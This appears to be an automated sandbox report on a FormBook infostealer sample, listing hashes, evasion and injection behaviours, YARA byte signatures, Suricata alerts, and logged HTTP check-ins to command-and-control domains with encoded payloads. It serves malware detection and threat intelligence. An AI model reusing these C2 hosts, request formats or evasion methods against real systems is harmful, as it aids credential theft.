Edit tour

Windows Analysis Report
RN# D7521-RN-00353 REV-2.exe

Overview

General Information

Sample name:	RN# D7521-RN-00353 REV-2.exe
Analysis ID:	1519424
MD5:	c001445a0c5badffefe083fe87340ced
SHA1:	049709962bd4733e19fadec7c7e880b12244dc9d
SHA256:	07a0addcc135c1bc4c8145e1c924052bde63780f807a5ea02b20769787eff420
Tags:	exeuser-lowmal3
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

Yara detected UAC Bypass using CMSTP

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

RN# D7521-RN-00353 REV-2.exe (PID: 6796 cmdline: "C:\Users\user\Desktop\RN# D7521-RN-00353 REV-2.exe" MD5: C001445A0C5BADFFEFE083FE87340CED)

wab.exe (PID: 6916 cmdline: "C:\Program Files (x86)\Windows Mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

uIklAoJgpkP.exe (PID: 3196 cmdline: "C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

auditpol.exe (PID: 4008 cmdline: "C:\Windows\SysWOW64\auditpol.exe" MD5: 70DF7973F8D4AAA2EE3B28391239397B)

uIklAoJgpkP.exe (PID: 1748 cmdline: "C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 4420 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

wab.exe (PID: 6944 cmdline: "C:\Program Files (x86)\Windows Mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

WerFault.exe (PID: 7152 cmdline: C:\Windows\system32\WerFault.exe -u -p 6796 -s 1020 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.4128918801.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.4128918801.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2be60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13ebf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f503:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17562:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.4128970770.0000000002F20000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.4128970770.0000000002F20000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2be60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13ebf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000B.00000002.4131269057.0000000004A90000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.4131269057.0000000004A90000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2ed7c:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16ddb:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.2015330736.0000000000570000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2015330736.0000000000570000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2be60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13ebf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2be60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x13ebf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.2015886760.0000000004F90000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000001.00000002.2015886760.0000000004F90000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x9da176:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9c21d5:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.4129577177.0000000004870000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.4129577177.0000000004870000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x9da176:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9c21d5:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Process Memory Space: RN# D7521-RN-00353 REV-2.exe PID: 6796	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RN# D7521-RN-00353 REV-2.exe PID: 6796	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.wab.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.wab.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2f503:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x17562:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.wab.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
1.2.wab.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x2e703:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x16762:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

Sigma Signatures

System Summary

Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe" , CommandLine: "C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe, NewProcessName: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe, OriginalFileName: C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe, ParentCommandLine: "C:\Program Files (x86)\Windows Mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 6916, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Program Files (x86)\xMTNUwHQkrAETKAtNDqDEHOgjBwWiRwPzmBRVIWIhFMClGyOYqfJAtaCrYmwMXlmIjkSNlfAlbxdtf\uIklAoJgpkP.exe" , ProcessId: 3196, ProcessName: uIklAoJgpkP.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-26T14:23:50.378242+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49742	147.92.40.174	80	TCP
2024-09-26T14:24:22.814280+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49747	203.161.43.245	80	TCP
2024-09-26T14:24:35.998820+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49751	13.248.169.48	80	TCP
2024-09-26T14:24:50.074829+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49755	44.213.25.70	80	TCP
2024-09-26T14:25:03.264303+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49759	3.33.130.190	80	TCP
2024-09-26T14:25:16.413058+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49763	3.33.130.190	80	TCP
2024-09-26T14:25:30.879325+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49767	103.255.237.233	80	TCP
2024-09-26T14:25:44.963690+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49771	3.33.130.190	80	TCP
2024-09-26T14:26:08.795017+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49775	221.121.144.149	80	TCP
2024-09-26T14:26:22.261486+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49779	85.159.66.93	80	TCP
2024-09-26T14:26:35.577429+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49783	50.3.111.89	80	TCP
2024-09-26T14:26:56.802703+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49787	3.33.130.190	80	TCP
2024-09-26T14:27:10.357134+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49791	13.248.252.114	80	TCP
2024-09-26T14:27:19.549092+0200	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	49792	147.92.40.174	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Yara detected FormBook

Source: Yara match	File source: 1.2.wab.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.wab.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.4128918801.0000000002ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2015274046.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4128970770.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4131269057.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2015330736.0000000000570000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2015886760.0000000004F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4129577177.0000000004870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: RN# D7521-RN-00353 REV-2.exe

Joe Sandbox ML: detected

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 00000000.00000002.1846177685.000001C000340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RN# D7521-RN-00353 REV-2.exe PID: 6796, type: MEMORYSTR

Source: RN# D7521-RN-00353 REV-2.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Microsoft.VisualBasic.ni.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: System.ni.pdbRSDS source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uIklAoJgpkP.exe, 00000009.00000002.4128841533.000000000085E000.00000002.00000001.01000000.00000008.sdmp, uIklAoJgpkP.exe, 0000000B.00000000.2079950190.000000000085E000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: auditpol.pdbGCTL source: wab.exe, 00000001.00000002.2015466794.0000000002D48000.00000004.00000020.00020000.00000000.sdmp, uIklAoJgpkP.exe, 00000009.00000002.4129190903.0000000000F68000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: wntdll.pdbUGP source: wab.exe, 00000001.00000003.1924059145.0000000002A0A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000001.00000002.2015508341.0000000002FDE000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000001.00000003.1922218565.0000000002655000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.2015347638.00000000032CC000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.2017276249.0000000003476000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: wab.exe, wab.exe, 00000001.00000003.1924059145.0000000002A0A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000001.00000002.2015508341.0000000002FDE000.00000040.00001000.00020000.00000000.sdmp, wab.exe, 00000001.00000003.1922218565.0000000002655000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, auditpol.exe, 0000000A.00000003.2015347638.00000000032CC000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000003.2017276249.0000000003476000.00000004.00000020.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmp, auditpol.exe, 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.pdbMicrosoft.VisualBasic.ni.dllMZ source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: auditpol.pdb source: wab.exe, 00000001.00000002.2015466794.0000000002D48000.00000004.00000020.00020000.00000000.sdmp, uIklAoJgpkP.exe, 00000009.00000002.4129190903.0000000000F68000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: System.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WERF40C.tmp.dmp.5.dr
Source:	Binary string: System.Core.ni.pdb source: WERF40C.tmp.dmp.5.dr

Source: C:\Windows\SysWOW64\auditpol.exe

Code function: 10_2_029BC2D0 FindFirstFileW,FindNextFileW,FindClose,

10_2_029BC2D0

Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 4x nop then xor eax, eax	10_2_029A9B30
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 4x nop then pop edi	10_2_029ADDE5
Source: C:\Windows\SysWOW64\auditpol.exe	Code function: 4x nop then mov ebx, 00000004h	10_2_034704DE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49751 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49759 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49755 -> 44.213.25.70:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49767 -> 103.255.237.233:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49763 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49779 -> 85.159.66.93:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49775 -> 221.121.144.149:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49783 -> 50.3.111.89:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49742 -> 147.92.40.174:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49791 -> 13.248.252.114:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49747 -> 203.161.43.245:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49771 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49787 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49792 -> 147.92.40.174:80

Performs DNS queries to domains with low reputation

Source:	DNS query: www.languyenthuyduyen.xyz
Source:	DNS query: www.13149200.xyz
Source:	DNS query: www.inf30027group23.xyz
Source:	DNS query: www.inf30027group23.xyz
Source:	DNS query: www.mudanya-nakliyat.xyz

Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View	IP Address: 44.213.25.70 44.213.25.70

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
Source: Joe Sandbox View	ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View	ASN Name: AS45671-NET-AUWholesaleServicesProviderAU AS45671-NET-AUWholesaleServicesProviderAU

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /i70z/?gB7t=xFqX1hC8&sL9tFJ=ggo41uDwxRIOOoeP1Oo5p7RDznCtlfKlzUAj4DLPY1E55MlxYQjRP3RbpEn9FapIu2dLvf4ZjTINa65Ki93S9Jq8KjMoDKqt4A2Swb3ejqHfvRtW1ozGZVs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.63582.photoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /gubb/?sL9tFJ=oPjgdHtcRwBFU1aA9ZOuj8Coc4bNSQhA+Z/l/vbVu6gyzA9FNnh3E8/0K3U760fP/mUdrl6a4REPJue/mxKU4Ri2QVEaCVjMmKnjA5rRPYPki2Nnm5W7gsk=&gB7t=xFqX1hC8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.stayup.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /s9un/?sL9tFJ=yV7TdkxfDhjd90B0KSEuK0Kqfi+wDaIV0zBeo1/164guPJfW3iKC9HyL21G52/AKQq5uaAr+ytnoQTz6UIOzVvXcy/Dczt/UyMTK+ZYHHCEGw8ax0ZASRvI=&gB7t=xFqX1hC8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.luxe.guruConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /paa2/?sL9tFJ=n7l4pK2vJUox4BGRRaSHHdo+nz+dFs7xbp1eoNPi6Q2eN5D+KpvM2vqKME65A47EEAJHO8M7tvWjwt8QkxqADfIieF9YUtvuZ7jYHQQX8NIphqxPsvx6gn4=&gB7t=xFqX1hC8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.newdaydawning.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /pt4m/?sL9tFJ=gto6zAZEImMHeJ+LpJq54hk6oy5OM0JeZOEv9IoNosKW45cXkvVUXc/PKOyk1O8wCdnCAQISoXLeySDC7Pr7VLt7iUiMsNXrOKCvlG99AM7B8PQExMggQoQ=&gB7t=xFqX1hC8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.theclydefund.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /dt20/?sL9tFJ=jMzfQmQmIDSzouF6Lox+3L2FgGYq5APQ95A7i7hmDDVLCGCM44ipqB5JCC3ZLSV4hUu+HvHwJbctiEvq8GXK62TkioYWTvl/FFz4Ja2JDvEPYzlsAsi7VtI=&gB7t=xFqX1hC8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.crowsecurity.cloudConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /ctkk/?sL9tFJ=kPi1sGtrrK6MgvdeecyTfrcQSpO0wr028ENKix9xnpjaLK+rUCaExClfx8VOmsMg4q/F6QibXlvsba63eJfmkGHAexdCL7DaV+OKMxuUWRxpipB6VVsrtbE=&gB7t=xFqX1hC8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.languyenthuyduyen.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Source: global traffic	HTTP traffic detected: GET /oigd/?sL9tFJ=XnrNo/zlUnrEuFxFTUYkG7ae+f7+plKfKKk7EkLGEdvHK0jxala+8MCeNIwWRYprQHn5WBVAcJl6ovxdzs+7zbqSxrzmMB33zbmHRpf7OsMcrqzoZipyUU4=&gB7t=xFqX1hC8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.comrade.lolConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
